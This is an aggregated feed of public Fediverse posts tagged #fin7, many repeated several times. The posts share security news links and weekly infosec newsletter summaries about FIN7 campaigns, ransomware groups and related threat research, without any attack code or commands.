#fin7 — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #fin7, aggregated by home.social.
-
GrayAlpha Operation Detection: The Fin7-Affiliated Group Spreads PowerNet Loader, NetSupport RAT, and MaskBat Loader – Source: socprime.com https://ciso2ciso.com/grayalpha-operation-detection-the-fin7-affiliated-group-spreads-powernet-loader-netsupport-rat-and-maskbat-loader-source-socprime-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #PowerNetLoader #Latestthreats #MaskBatLoader #NetSupportRAT #socprimecom #GrayAlpha #socprime #Blog #FIN7 #RaaS
-
GrayAlpha Operation Detection: The Fin7-Affiliated Group Spreads PowerNet Loader, NetSupport RAT, and MaskBat Loader – Source: socprime.com https://ciso2ciso.com/grayalpha-operation-detection-the-fin7-affiliated-group-spreads-powernet-loader-netsupport-rat-and-maskbat-loader-source-socprime-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #PowerNetLoader #Latestthreats #MaskBatLoader #NetSupportRAT #socprimecom #GrayAlpha #socprime #Blog #FIN7 #RaaS
-
GrayAlpha Operation Detection: The Fin7-Affiliated Group Spreads PowerNet Loader, NetSupport RAT, and MaskBat Loader – Source: socprime.com https://ciso2ciso.com/grayalpha-operation-detection-the-fin7-affiliated-group-spreads-powernet-loader-netsupport-rat-and-maskbat-loader-source-socprime-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #PowerNetLoader #Latestthreats #MaskBatLoader #NetSupportRAT #socprimecom #GrayAlpha #socprime #Blog #FIN7 #RaaS
-
GrayAlpha Operation Detection: The Fin7-Affiliated Group Spreads PowerNet Loader, NetSupport RAT, and MaskBat Loader – Source: socprime.com https://ciso2ciso.com/grayalpha-operation-detection-the-fin7-affiliated-group-spreads-powernet-loader-netsupport-rat-and-maskbat-loader-source-socprime-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #PowerNetLoader #Latestthreats #MaskBatLoader #NetSupportRAT #socprimecom #GrayAlpha #socprime #Blog #FIN7 #RaaS
-
Ukraine’s largest bank PrivatBank Targeted with SmokeLoader malware – Source:hackread.com https://ciso2ciso.com/ukraines-largest-bank-privatbank-targeted-with-smokeloader-malware-sourcehackread-com/ #1CyberSecurityNewsPost #CyberSecurityNews #cybersecurity #CyberAttacks #BlackBasta #PrivatBank #Hackread #Phishing #security #UAC0006 #Ukraine #Russia #FIN7
-
Ukraine’s largest bank PrivatBank Targeted with SmokeLoader malware https://hackread.com/ukraine-largest-bank-privatbank-smokeloader-malware/ #Cybersecurity #CyberAttacks #BlackBasta #PrivatBank #Security #Phishing #UAC0006 #Ukraine #Russia #FIN7
-
One Step Ahead in Cyber Hide-and-Seek: Automating Malicious Infrastructure Discovery With Graph Neural Networks
#FIN7
https://unit42.paloaltonetworks.com/graph-neural-networks/ -
Web Hacking Service ‘Araneida’ Tied to Turkish IT Firm
https://krebsonsecurity.com/2024/12/web-hacking-service-araneida-tied-to-turkish-it-firm/
#U.S.DepartmentofHealthandHumanServices #ori0nbusiness@protonmail.com #altugsara321@gmail.com #Ne'er-Do-WellNews #ALittleSunshine #AraneidaScanner #InvictiSecurity #TheComingStorm #BilitroYazilim #MattSciberras #Breadcrumbs #domaintools #NeilRoseman #ZachEdwards #SilentPush #AltugSara #Acunetix #Fin7
-
Web Hacking Service ‘Araneida’ Tied to Turkish IT Firm
https://krebsonsecurity.com/2024/12/web-hacking-service-araneida-tied-to-turkish-it-firm/
#U.S.DepartmentofHealthandHumanServices #ori0nbusiness@protonmail.com #altugsara321@gmail.com #Ne'er-Do-WellNews #ALittleSunshine #AraneidaScanner #InvictiSecurity #TheComingStorm #BilitroYazilim #MattSciberras #Breadcrumbs #domaintools #NeilRoseman #ZachEdwards #SilentPush #AltugSara #Acunetix #Fin7
-
Web Hacking Service ‘Araneida’ Tied to Turkish IT Firm
https://krebsonsecurity.com/2024/12/web-hacking-service-araneida-tied-to-turkish-it-firm/
#U.S.DepartmentofHealthandHumanServices #ori0nbusiness@protonmail.com #altugsara321@gmail.com #Ne'er-Do-WellNews #ALittleSunshine #AraneidaScanner #InvictiSecurity #TheComingStorm #BilitroYazilim #MattSciberras #Breadcrumbs #domaintools #NeilRoseman #ZachEdwards #SilentPush #AltugSara #Acunetix #Fin7
-
Web Hacking Service ‘Araneida’ Tied to Turkish IT Firm
https://krebsonsecurity.com/2024/12/web-hacking-service-araneida-tied-to-turkish-it-firm/
#U.S.DepartmentofHealthandHumanServices #ori0nbusiness@protonmail.com #altugsara321@gmail.com #Ne'er-Do-WellNews #ALittleSunshine #AraneidaScanner #InvictiSecurity #TheComingStorm #BilitroYazilim #MattSciberras #Breadcrumbs #domaintools #NeilRoseman #ZachEdwards #SilentPush #AltugSara #Acunetix #Fin7
-
Web Hacking Service ‘Araneida’ Tied to Turkish IT Firm
https://krebsonsecurity.com/2024/12/web-hacking-service-araneida-tied-to-turkish-it-firm/
#U.S.DepartmentofHealthandHumanServices #ori0nbusiness@protonmail.com #altugsara321@gmail.com #Ne'er-Do-WellNews #ALittleSunshine #AraneidaScanner #InvictiSecurity #TheComingStorm #BilitroYazilim #MattSciberras #Breadcrumbs #domaintools #NeilRoseman #ZachEdwards #SilentPush #AltugSara #Acunetix #Fin7
-
Web Hacking Service ‘Araneida’ Tied to Turkish IT Firm https://krebsonsecurity.com/2024/12/web-hacking-service-araneida-tied-to-turkish-it-firm/ #USDepartmentofHealthandHumanServices #ori0nbusiness@protonmailcom #altugsara321@gmail.com #Ne'er-Do-WellNews #ALittleSunshine #AraneidaScanner #InvictiSecurity #TheComingStorm #BilitroYazilim #MattSciberras #Breadcrumbs #domaintools #NeilRoseman #ZachEdwards #SilentPush #AltugSara #Acunetix #Fin7
-
Web Hacking Service ‘Araneida’ Tied to Turkish IT Firm https://krebsonsecurity.com/2024/12/web-hacking-service-araneida-tied-to-turkish-it-firm/ #USDepartmentofHealthandHumanServices #ori0nbusiness@protonmailcom #altugsara321@gmail.com #Ne'er-Do-WellNews #ALittleSunshine #AraneidaScanner #InvictiSecurity #TheComingStorm #BilitroYazilim #MattSciberras #Breadcrumbs #domaintools #NeilRoseman #ZachEdwards #SilentPush #AltugSara #Acunetix #Fin7
-
Web Hacking Service ‘Araneida’ Tied to Turkish IT Firm https://krebsonsecurity.com/2024/12/web-hacking-service-araneida-tied-to-turkish-it-firm/ #USDepartmentofHealthandHumanServices #ori0nbusiness@protonmailcom #altugsara321@gmail.com #Ne'er-Do-WellNews #ALittleSunshine #AraneidaScanner #InvictiSecurity #TheComingStorm #BilitroYazilim #MattSciberras #Breadcrumbs #domaintools #NeilRoseman #ZachEdwards #SilentPush #AltugSara #Acunetix #Fin7
-
The Russian cybercrime group FIN7 ran a network of fake AI undressing sites that delivered credential stealing malware to those who uploaded pictures. I gotta say, this is one group of cybercrime victims that I don't feel sorry for.
https://www.silentpush.com/blog/fin7-malware-deepfake-ai-honeypot/
#FIN7 #Russia #Cybercrime #NetSupport #NetSupportRAT #RAT #Malware #CredentialTheft #AI #Deepfake #Deepfakes #DeepNude #DeepNueds #SilentPush
-
FIN7 Cybercrime Gang Evolves with Ransomware and Hacking Tools https://hackread.com/fin7-cybercrime-gang-ransomware-hacking-tools/ #CyberAttack #CyberCrime #Ransomware #Security #security #hacking #Russia #FIN7
-
Threat group FIN7 adapts with new tactics and tools, researchers say⤵️
#FIN7 #cybersecurity #technology #infosec #ransomwarehttps://cnews.link/fin7-cyber-threat-group-new-tactics-tools/
-
FIN7 Cybercriminal Gang Adopts Techniques to Elude EDR and Automate Attacks https://thecyberexpress.com/fin7-gang-elude-edr-and-automate-attacks/ #TheCyberExpressNews #CybersecurityNews #TheCyberExpress #FirewallDaily #AvNeutralizer #cybercriminal #FIN7 #EDR
-
📬 Lesetipps: Marvel jagt den „Captain America: Brave New World“-Leaker
#Lesetipps #AME #CaptainAmerica #FIN7 #Kriminalisierung #Marvel #Systemhack https://sc.tarnkappe.info/4e4a95 -
FIN7 Cybercrime Group Strikes US Auto Sector Using Carbanak – Source: securityboulevard.com https://ciso2ciso.com/fin7-cybercrime-group-strikes-us-auto-sector-using-carbanak-source-securityboulevard-com/ #multifactorauthentication #phishingawarenesstraining #rssfeedpostgeneratorecho #SecurityBloggersNetwork #CyberSecurityNews #CybersecurityNews #SecurityBoulevard #Identity&Access #Cybersecurity #spearphishing #ransomware #Carbanak #FIN7
-
FIN7 Cybercrime Group Strikes US Auto Sector Using Carbanak – Source: securityboulevard.com https://ciso2ciso.com/fin7-cybercrime-group-strikes-us-auto-sector-using-carbanak-source-securityboulevard-com/ #multifactorauthentication #phishingawarenesstraining #rssfeedpostgeneratorecho #SecurityBloggersNetwork #CyberSecurityNews #CybersecurityNews #SecurityBoulevard #Identity&Access #Cybersecurity #spearphishing #ransomware #Carbanak #FIN7
-
FIN7 Cybercrime Group Strikes US Auto Sector Using Carbanak – Source: securityboulevard.com https://ciso2ciso.com/fin7-cybercrime-group-strikes-us-auto-sector-using-carbanak-source-securityboulevard-com/ #multifactorauthentication #phishingawarenesstraining #rssfeedpostgeneratorecho #SecurityBloggersNetwork #CyberSecurityNews #CybersecurityNews #SecurityBoulevard #Identity&Access #Cybersecurity #spearphishing #ransomware #Carbanak #FIN7
-
FIN7 Cybercrime Group Strikes US Auto Sector Using Carbanak – Source: securityboulevard.com https://ciso2ciso.com/fin7-cybercrime-group-strikes-us-auto-sector-using-carbanak-source-securityboulevard-com/ #multifactorauthentication #phishingawarenesstraining #rssfeedpostgeneratorecho #SecurityBloggersNetwork #CyberSecurityNews #CybersecurityNews #SecurityBoulevard #Identity&Access #Cybersecurity #spearphishing #ransomware #Carbanak #FIN7
-
FIN7 targeted a large U.S. carmaker with phishing attacks – Source: securityaffairs.com https://ciso2ciso.com/fin7-targeted-a-large-u-s-carmaker-with-phishing-attacks-source-securityaffairs-com/ #rssfeedpostgeneratorecho #ITInformationSecurity #SecurityAffairscom #CyberSecurityNews #PierluigiPaganini #SecurityAffairs #SecurityAffairs #BreakingNews #SecurityNews #hackingnews #CyberCrime #Cybercrime #hacking #Malware #FIN7 #APT
-
Onapsis and Flashpoint produced a 29 report on the cyber threat landscape for SAP applications over the past 4 years. SAP is the world's largest provider of enterprise application software. The report highlights the material risk of SAP ransomware attacks and the growing maturity of cybercriminal capabilities. Their appendices at the bottom list known SAP vulnerabilities (if they're on CISA's Known Exploited Vulnerabilities (KEV) Catalog), as well as MITRE ATT&CK techniques associated with SAP exploitation, and threat actors (financially motivated and ransomware groups) targeting SAP-using organizations. 🔗 (PDF) https://go.onapsis.com/threat-report/ch4tter
#SAP #vulnerability #cybercrime #threatintel #FIN13 #CobaltSpider #FIN7 #BlackCat #AlphV #BianLian #BlackBasta
-
Onapsis and Flashpoint produced a 29 report on the cyber threat landscape for SAP applications over the past 4 years. SAP is the world's largest provider of enterprise application software. The report highlights the material risk of SAP ransomware attacks and the growing maturity of cybercriminal capabilities. Their appendices at the bottom list known SAP vulnerabilities (if they're on CISA's Known Exploited Vulnerabilities (KEV) Catalog), as well as MITRE ATT&CK techniques associated with SAP exploitation, and threat actors (financially motivated and ransomware groups) targeting SAP-using organizations. 🔗 (PDF) https://go.onapsis.com/threat-report/ch4tter
#SAP #vulnerability #cybercrime #threatintel #FIN13 #CobaltSpider #FIN7 #BlackCat #AlphV #BianLian #BlackBasta
-
Onapsis and Flashpoint produced a 29 report on the cyber threat landscape for SAP applications over the past 4 years. SAP is the world's largest provider of enterprise application software. The report highlights the material risk of SAP ransomware attacks and the growing maturity of cybercriminal capabilities. Their appendices at the bottom list known SAP vulnerabilities (if they're on CISA's Known Exploited Vulnerabilities (KEV) Catalog), as well as MITRE ATT&CK techniques associated with SAP exploitation, and threat actors (financially motivated and ransomware groups) targeting SAP-using organizations. 🔗 (PDF) https://go.onapsis.com/threat-report/ch4tter
#SAP #vulnerability #cybercrime #threatintel #FIN13 #CobaltSpider #FIN7 #BlackCat #AlphV #BianLian #BlackBasta
-
Onapsis and Flashpoint produced a 29 report on the cyber threat landscape for SAP applications over the past 4 years. SAP is the world's largest provider of enterprise application software. The report highlights the material risk of SAP ransomware attacks and the growing maturity of cybercriminal capabilities. Their appendices at the bottom list known SAP vulnerabilities (if they're on CISA's Known Exploited Vulnerabilities (KEV) Catalog), as well as MITRE ATT&CK techniques associated with SAP exploitation, and threat actors (financially motivated and ransomware groups) targeting SAP-using organizations. 🔗 (PDF) https://go.onapsis.com/threat-report/ch4tter
#SAP #vulnerability #cybercrime #threatintel #FIN13 #CobaltSpider #FIN7 #BlackCat #AlphV #BianLian #BlackBasta
-
Onapsis and Flashpoint produced a 29 report on the cyber threat landscape for SAP applications over the past 4 years. SAP is the world's largest provider of enterprise application software. The report highlights the material risk of SAP ransomware attacks and the growing maturity of cybercriminal capabilities. Their appendices at the bottom list known SAP vulnerabilities (if they're on CISA's Known Exploited Vulnerabilities (KEV) Catalog), as well as MITRE ATT&CK techniques associated with SAP exploitation, and threat actors (financially motivated and ransomware groups) targeting SAP-using organizations. 🔗 (PDF) https://go.onapsis.com/threat-report/ch4tter
#SAP #vulnerability #cybercrime #threatintel #FIN13 #CobaltSpider #FIN7 #BlackCat #AlphV #BianLian #BlackBasta
-
FIN7 Hackers Attacking IT Employees Of Automotive Industry https://gbhackers.com/fin7-automotive-it-targets/ #IncidentResponse #cybersecurity #spearphishing #CyberAttack #Phishing #Fin7
-
BlackBerry reports on a spear-phishing campaign in late 2023 by the financially motivated FIN7 targeting a large U.S. automotive manufacturer. They targeted IT department employees with admin rights using a free IP scanning tool, to deloy Anunak backdoor. FIN7 performed living off the land binaries, scripts and libraries (lolbas). MITRE ATT&CK TTPs and IOC provided. 🔗 https://blogs.blackberry.com/en/2024/04/fin7-targets-the-united-states-automotive-industry
-
Another week, another newsletter - catch up on the week's infosec news here:
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-240423-300423
Researchers have found that nearly two years on, 2 in 3 installs of #Apache #Superset are still using default Flask Secret Keys - a configuration flaw which would allow an attacker to forge session cookies and access said servers with full administrative privileges.
#Kritec is a commodity #skimmer found installed on compromised #Magecart sites, with its code heavily obfuscated and customised to match the site's aesthetic in order to con users out of credit card details.
#FIN7 look to be popping instances of the #Veeam backup software that are unpatched for a recent vulnerability; a revised #ViperSoftX #infostealer now targets #1password and #keepass password vaults, and #TA505 deliver a new infostealer through a #GoogleAds campaign
#LockBit & #CL0P ransomware affiliates have been abusing a month-old vulnerability in the #PaperCut print management software to drop ransomware. With the cat out of the bag, security researchers have decided now is a great time to drop a PoC exploit on Github - I mean, why not let the skiddies get in on the action too, right?
The #blueteam have some great research worth reading on #Smishing via #AWS; detections for #SliverC2 and different implementations of #PsExec, as well as #Sigma integration for #SentinelOne and a #KQL hack for monitoring LOLDrivers.
Have a great week ahead folks, I hope this newsletter proves helpful!
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-240423-300423
#infosec #cyber #news #newsletter #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #malware #ransomware #affiliate #dfir #soc #threatintel #threatintelligence #threathunting #detection #threatdetection #detectionengineering #flask #python #fraud #malvertising #clop #PoC #exploit #securityresearch #LOLBAS #LOLBIN #BYOVD
-
Another week, another newsletter - catch up on the week's infosec news here:
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-240423-300423
Researchers have found that nearly two years on, 2 in 3 installs of #Apache #Superset are still using default Flask Secret Keys - a configuration flaw which would allow an attacker to forge session cookies and access said servers with full administrative privileges.
#Kritec is a commodity #skimmer found installed on compromised #Magecart sites, with its code heavily obfuscated and customised to match the site's aesthetic in order to con users out of credit card details.
#FIN7 look to be popping instances of the #Veeam backup software that are unpatched for a recent vulnerability; a revised #ViperSoftX #infostealer now targets #1password and #keepass password vaults, and #TA505 deliver a new infostealer through a #GoogleAds campaign
#LockBit & #CL0P ransomware affiliates have been abusing a month-old vulnerability in the #PaperCut print management software to drop ransomware. With the cat out of the bag, security researchers have decided now is a great time to drop a PoC exploit on Github - I mean, why not let the skiddies get in on the action too, right?
The #blueteam have some great research worth reading on #Smishing via #AWS; detections for #SliverC2 and different implementations of #PsExec, as well as #Sigma integration for #SentinelOne and a #KQL hack for monitoring LOLDrivers.
Have a great week ahead folks, I hope this newsletter proves helpful!
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-240423-300423
#infosec #cyber #news #newsletter #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #malware #ransomware #affiliate #dfir #soc #threatintel #threatintelligence #threathunting #detection #threatdetection #detectionengineering #flask #python #fraud #malvertising #clop #PoC #exploit #securityresearch #LOLBAS #LOLBIN #BYOVD
-
Another week, another newsletter - catch up on the week's infosec news here:
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-240423-300423
Researchers have found that nearly two years on, 2 in 3 installs of #Apache #Superset are still using default Flask Secret Keys - a configuration flaw which would allow an attacker to forge session cookies and access said servers with full administrative privileges.
#Kritec is a commodity #skimmer found installed on compromised #Magecart sites, with its code heavily obfuscated and customised to match the site's aesthetic in order to con users out of credit card details.
#FIN7 look to be popping instances of the #Veeam backup software that are unpatched for a recent vulnerability; a revised #ViperSoftX #infostealer now targets #1password and #keepass password vaults, and #TA505 deliver a new infostealer through a #GoogleAds campaign
#LockBit & #CL0P ransomware affiliates have been abusing a month-old vulnerability in the #PaperCut print management software to drop ransomware. With the cat out of the bag, security researchers have decided now is a great time to drop a PoC exploit on Github - I mean, why not let the skiddies get in on the action too, right?
The #blueteam have some great research worth reading on #Smishing via #AWS; detections for #SliverC2 and different implementations of #PsExec, as well as #Sigma integration for #SentinelOne and a #KQL hack for monitoring LOLDrivers.
Have a great week ahead folks, I hope this newsletter proves helpful!
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-240423-300423
#infosec #cyber #news #newsletter #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #malware #ransomware #affiliate #dfir #soc #threatintel #threatintelligence #threathunting #detection #threatdetection #detectionengineering #flask #python #fraud #malvertising #clop #PoC #exploit #securityresearch #LOLBAS #LOLBIN #BYOVD
-
Another week, another newsletter - catch up on the week's infosec news here:
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-240423-300423
Researchers have found that nearly two years on, 2 in 3 installs of #Apache #Superset are still using default Flask Secret Keys - a configuration flaw which would allow an attacker to forge session cookies and access said servers with full administrative privileges.
#Kritec is a commodity #skimmer found installed on compromised #Magecart sites, with its code heavily obfuscated and customised to match the site's aesthetic in order to con users out of credit card details.
#FIN7 look to be popping instances of the #Veeam backup software that are unpatched for a recent vulnerability; a revised #ViperSoftX #infostealer now targets #1password and #keepass password vaults, and #TA505 deliver a new infostealer through a #GoogleAds campaign
#LockBit & #CL0P ransomware affiliates have been abusing a month-old vulnerability in the #PaperCut print management software to drop ransomware. With the cat out of the bag, security researchers have decided now is a great time to drop a PoC exploit on Github - I mean, why not let the skiddies get in on the action too, right?
The #blueteam have some great research worth reading on #Smishing via #AWS; detections for #SliverC2 and different implementations of #PsExec, as well as #Sigma integration for #SentinelOne and a #KQL hack for monitoring LOLDrivers.
Have a great week ahead folks, I hope this newsletter proves helpful!
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-240423-300423
#infosec #cyber #news #newsletter #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #malware #ransomware #affiliate #dfir #soc #threatintel #threatintelligence #threathunting #detection #threatdetection #detectionengineering #flask #python #fraud #malvertising #clop #PoC #exploit #securityresearch #LOLBAS #LOLBIN #BYOVD
-
Another week, another newsletter - catch up on the week's infosec news here:
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-240423-300423
Researchers have found that nearly two years on, 2 in 3 installs of #Apache #Superset are still using default Flask Secret Keys - a configuration flaw which would allow an attacker to forge session cookies and access said servers with full administrative privileges.
#Kritec is a commodity #skimmer found installed on compromised #Magecart sites, with its code heavily obfuscated and customised to match the site's aesthetic in order to con users out of credit card details.
#FIN7 look to be popping instances of the #Veeam backup software that are unpatched for a recent vulnerability; a revised #ViperSoftX #infostealer now targets #1password and #keepass password vaults, and #TA505 deliver a new infostealer through a #GoogleAds campaign
#LockBit & #CL0P ransomware affiliates have been abusing a month-old vulnerability in the #PaperCut print management software to drop ransomware. With the cat out of the bag, security researchers have decided now is a great time to drop a PoC exploit on Github - I mean, why not let the skiddies get in on the action too, right?
The #blueteam have some great research worth reading on #Smishing via #AWS; detections for #SliverC2 and different implementations of #PsExec, as well as #Sigma integration for #SentinelOne and a #KQL hack for monitoring LOLDrivers.
Have a great week ahead folks, I hope this newsletter proves helpful!
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-240423-300423
#infosec #cyber #news #newsletter #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #malware #ransomware #affiliate #dfir #soc #threatintel #threatintelligence #threathunting #detection #threatdetection #detectionengineering #flask #python #fraud #malvertising #clop #PoC #exploit #securityresearch #LOLBAS #LOLBIN #BYOVD
-
It's been a heck of a week, with tonnes of great research and tooling that I'm sure you're going to get a kick out of - check out our wrap-up for all the news!:
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-16042023
Kaspersky researchers shone a light on the Dark Web trade in Google Play Loaders - a service to help inject malware into legitimate, and supposedly vetted apps, with guarantees of >1 week up-time and the option to boost your spread with targeted Ads.
#Nokoyawa ransomware have clearly got some talent on their team, having abused a #CLFS 0-day prior to Microsoft patching it last week - one of 5 different exploits they've used, mind you - and they appear to have a new, distinct ransomware strain in rotation, too.
There's heaps more great threat reporting, including a report that #FIN7 and former #Conti (#FIN12/#WizardSpider) members are collaborating on a new backdoor, and a crypto-mining campaign that may be the canary in the coal mine, indicating broader uptake of BYOVD and IPFS by low-level operators.
The #QueueJumper vulnerability from last week looks primed to explode in coming days, with a no-fix vulnerability in Microsoft Intune capping off a lousy week for Windows admins struggling to keep their networks secure.
TOOLING. Ooooh boy, this was a good week for tooling and tradecraft, ladies and gentlemen.
The #redteam have a new port of the SharpHound AD enumeration tool for Cobalt Strike; a great reference piece on leveraging stolen Office tokens to bypass MFA and access cloud workloads, and a list of keywords to avoid when crafting stealthy PowerShell scripts.
The #blueteam have a script to help tweak VM settings to circumvent malware anti-analysis checks; Procmon for macOS, and a lightweight bastion host to help redirect and record traffic sent to honeypots in your network.
This was a fun one to write up, with heaps of interesting reads and takeaways to be had. Get amongst it!
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-16042023
#infosec #cyber #news #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #malware #ransomware #dfir #soc #threatintel #threatintelligence #darkweb #microsoft #azure #mfa #mfabypass #cobaltstrike #bloodhound #sharphound #byovd #ipfs #intune #GooglePlay #Android #zeroday #0day
-
It's been a heck of a week, with tonnes of great research and tooling that I'm sure you're going to get a kick out of - check out our wrap-up for all the news!:
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-16042023
Kaspersky researchers shone a light on the Dark Web trade in Google Play Loaders - a service to help inject malware into legitimate, and supposedly vetted apps, with guarantees of >1 week up-time and the option to boost your spread with targeted Ads.
#Nokoyawa ransomware have clearly got some talent on their team, having abused a #CLFS 0-day prior to Microsoft patching it last week - one of 5 different exploits they've used, mind you - and they appear to have a new, distinct ransomware strain in rotation, too.
There's heaps more great threat reporting, including a report that #FIN7 and former #Conti (#FIN12/#WizardSpider) members are collaborating on a new backdoor, and a crypto-mining campaign that may be the canary in the coal mine, indicating broader uptake of BYOVD and IPFS by low-level operators.
The #QueueJumper vulnerability from last week looks primed to explode in coming days, with a no-fix vulnerability in Microsoft Intune capping off a lousy week for Windows admins struggling to keep their networks secure.
TOOLING. Ooooh boy, this was a good week for tooling and tradecraft, ladies and gentlemen.
The #redteam have a new port of the SharpHound AD enumeration tool for Cobalt Strike; a great reference piece on leveraging stolen Office tokens to bypass MFA and access cloud workloads, and a list of keywords to avoid when crafting stealthy PowerShell scripts.
The #blueteam have a script to help tweak VM settings to circumvent malware anti-analysis checks; Procmon for macOS, and a lightweight bastion host to help redirect and record traffic sent to honeypots in your network.
This was a fun one to write up, with heaps of interesting reads and takeaways to be had. Get amongst it!
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-16042023
#infosec #cyber #news #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #malware #ransomware #dfir #soc #threatintel #threatintelligence #darkweb #microsoft #azure #mfa #mfabypass #cobaltstrike #bloodhound #sharphound #byovd #ipfs #intune #GooglePlay #Android #zeroday #0day
-
It's been a heck of a week, with tonnes of great research and tooling that I'm sure you're going to get a kick out of - check out our wrap-up for all the news!:
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-16042023
Kaspersky researchers shone a light on the Dark Web trade in Google Play Loaders - a service to help inject malware into legitimate, and supposedly vetted apps, with guarantees of >1 week up-time and the option to boost your spread with targeted Ads.
#Nokoyawa ransomware have clearly got some talent on their team, having abused a #CLFS 0-day prior to Microsoft patching it last week - one of 5 different exploits they've used, mind you - and they appear to have a new, distinct ransomware strain in rotation, too.
There's heaps more great threat reporting, including a report that #FIN7 and former #Conti (#FIN12/#WizardSpider) members are collaborating on a new backdoor, and a crypto-mining campaign that may be the canary in the coal mine, indicating broader uptake of BYOVD and IPFS by low-level operators.
The #QueueJumper vulnerability from last week looks primed to explode in coming days, with a no-fix vulnerability in Microsoft Intune capping off a lousy week for Windows admins struggling to keep their networks secure.
TOOLING. Ooooh boy, this was a good week for tooling and tradecraft, ladies and gentlemen.
The #redteam have a new port of the SharpHound AD enumeration tool for Cobalt Strike; a great reference piece on leveraging stolen Office tokens to bypass MFA and access cloud workloads, and a list of keywords to avoid when crafting stealthy PowerShell scripts.
The #blueteam have a script to help tweak VM settings to circumvent malware anti-analysis checks; Procmon for macOS, and a lightweight bastion host to help redirect and record traffic sent to honeypots in your network.
This was a fun one to write up, with heaps of interesting reads and takeaways to be had. Get amongst it!
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-16042023
#infosec #cyber #news #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #malware #ransomware #dfir #soc #threatintel #threatintelligence #darkweb #microsoft #azure #mfa #mfabypass #cobaltstrike #bloodhound #sharphound #byovd #ipfs #intune #GooglePlay #Android #zeroday #0day
-
It's been a heck of a week, with tonnes of great research and tooling that I'm sure you're going to get a kick out of - check out our wrap-up for all the news!:
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-16042023
Kaspersky researchers shone a light on the Dark Web trade in Google Play Loaders - a service to help inject malware into legitimate, and supposedly vetted apps, with guarantees of >1 week up-time and the option to boost your spread with targeted Ads.
#Nokoyawa ransomware have clearly got some talent on their team, having abused a #CLFS 0-day prior to Microsoft patching it last week - one of 5 different exploits they've used, mind you - and they appear to have a new, distinct ransomware strain in rotation, too.
There's heaps more great threat reporting, including a report that #FIN7 and former #Conti (#FIN12/#WizardSpider) members are collaborating on a new backdoor, and a crypto-mining campaign that may be the canary in the coal mine, indicating broader uptake of BYOVD and IPFS by low-level operators.
The #QueueJumper vulnerability from last week looks primed to explode in coming days, with a no-fix vulnerability in Microsoft Intune capping off a lousy week for Windows admins struggling to keep their networks secure.
TOOLING. Ooooh boy, this was a good week for tooling and tradecraft, ladies and gentlemen.
The #redteam have a new port of the SharpHound AD enumeration tool for Cobalt Strike; a great reference piece on leveraging stolen Office tokens to bypass MFA and access cloud workloads, and a list of keywords to avoid when crafting stealthy PowerShell scripts.
The #blueteam have a script to help tweak VM settings to circumvent malware anti-analysis checks; Procmon for macOS, and a lightweight bastion host to help redirect and record traffic sent to honeypots in your network.
This was a fun one to write up, with heaps of interesting reads and takeaways to be had. Get amongst it!
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-16042023
#infosec #cyber #news #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #malware #ransomware #dfir #soc #threatintel #threatintelligence #darkweb #microsoft #azure #mfa #mfabypass #cobaltstrike #bloodhound #sharphound #byovd #ipfs #intune #GooglePlay #Android #zeroday #0day
-
It's been a heck of a week, with tonnes of great research and tooling that I'm sure you're going to get a kick out of - check out our wrap-up for all the news!:
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-16042023
Kaspersky researchers shone a light on the Dark Web trade in Google Play Loaders - a service to help inject malware into legitimate, and supposedly vetted apps, with guarantees of >1 week up-time and the option to boost your spread with targeted Ads.
#Nokoyawa ransomware have clearly got some talent on their team, having abused a #CLFS 0-day prior to Microsoft patching it last week - one of 5 different exploits they've used, mind you - and they appear to have a new, distinct ransomware strain in rotation, too.
There's heaps more great threat reporting, including a report that #FIN7 and former #Conti (#FIN12/#WizardSpider) members are collaborating on a new backdoor, and a crypto-mining campaign that may be the canary in the coal mine, indicating broader uptake of BYOVD and IPFS by low-level operators.
The #QueueJumper vulnerability from last week looks primed to explode in coming days, with a no-fix vulnerability in Microsoft Intune capping off a lousy week for Windows admins struggling to keep their networks secure.
TOOLING. Ooooh boy, this was a good week for tooling and tradecraft, ladies and gentlemen.
The #redteam have a new port of the SharpHound AD enumeration tool for Cobalt Strike; a great reference piece on leveraging stolen Office tokens to bypass MFA and access cloud workloads, and a list of keywords to avoid when crafting stealthy PowerShell scripts.
The #blueteam have a script to help tweak VM settings to circumvent malware anti-analysis checks; Procmon for macOS, and a lightweight bastion host to help redirect and record traffic sent to honeypots in your network.
This was a fun one to write up, with heaps of interesting reads and takeaways to be had. Get amongst it!
